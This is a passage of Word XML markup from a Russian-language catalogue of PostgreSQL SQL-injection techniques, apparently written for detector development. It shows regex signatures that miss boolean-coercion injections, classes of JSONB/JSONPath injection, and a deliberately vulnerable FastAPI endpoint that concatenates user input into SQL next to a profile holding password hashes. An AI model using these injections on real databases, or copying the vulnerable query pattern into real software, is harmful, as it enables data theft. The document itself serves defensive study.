          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'  true  '</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после trim — true). Сигнатура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR\s+1\s*=\s*1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR\s+'1'\s*=\s*'1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (text-comparison) и не покрывает bool-equivalent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR\s+'on'\s*=\s*'yes'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBDB493" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.2/3.11.3/3.11.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельные классы 3.11. Все используют implicit coercion для injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC53428" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекса для concat-в-bool-context (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=\s*['"][^'"]*['"]\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.11 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.11.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576ECAAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506261A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Boolean Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — list принимаемых литералов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69485752" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Type Conversion — Implicit Casts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — coercion-правила.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174ACBF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Conditional Expressions — CASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — guarantee на single-branch evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7FA124" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection — boolean-based blind variants</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55B6D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — type coercion bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255380D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.11.2 jsonb -&gt; и -&gt;&gt; (JSON path injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8276D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.11.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B153168" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17151177" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>JSONB-операторы PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4BBBED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data -&gt; 'key'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsonb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — извлечение поля как jsonb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7547B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data -&gt;&gt; 'key'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — извлечение поля как text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604C2DE9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data #&gt; '{a,b,c}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsonb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — извлечение по path-array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A30F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data #&gt;&gt; '{a,b,c}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же, как text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01854E19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data @@ '$.path == "value"'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PG 12+) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JSONPath-предикат.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7211CACE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data @? '$.path'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PG 12+) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — существование пути.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9E23BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Операторы принимают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>строковые литералы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как имена ключей или JSONPath-выражения. Если строка строится через конкатенацию с user-input, атакующий контролирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSON-path как DSL</w:t>
      </w:r>
      <w:r>
        <w:t>, что эквивалентно injection во вторичный язык.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CE0C69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JSONB-injection классов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBEF08F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Arbitrary key extraction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;'$user_key'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> позволяет читать любое поле JSON-документа, не только то, что предполагалось.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471F84AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSONPath injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@@</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PG 12+ jsonpath имеет операторы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для фильтрации, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.**</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для рекурсивного спуска, арифметику, regex — полноценный мини-DSL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F31BBD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cast confusion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(data-&gt;&gt;'k')::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(data-&gt;&gt;'k')::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбинация с 3.2.x для error-based leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FEE1AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Type erasure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;'k'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает jsonb (со всей структурой); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> теряет тип, превращая в text. Атакующий выбирает форму для нужного сценария.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A24456C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — arbitrary key extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C881415" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст: эндпоинт возвращает publicly-visible поля JSON-документа пользователя. Код:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7726EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/profile/{user_id}/field")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151CF58B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_field(user_id: int, field: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130485C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ожидается: field in ['name', 'avatar', 'bio']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8BEFB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"SELECT data-&gt;&gt;'{field}' FROM user_profiles WHERE id = :uid")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26772415" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(q, {"uid": user_id})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AFF7BF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C0241E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user_profiles.data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — jsonb с публичными и приватными полями:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636628B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6F71EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "name": "Alice",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1172354B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "avatar": "...",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65732774" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "bio": "...",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD899A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "password_hash": "$2b$12$...",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54811C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "email": "alice@co.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9D06F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "internal_notes": "VIP customer, contact CEO"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEE142F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67890B17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
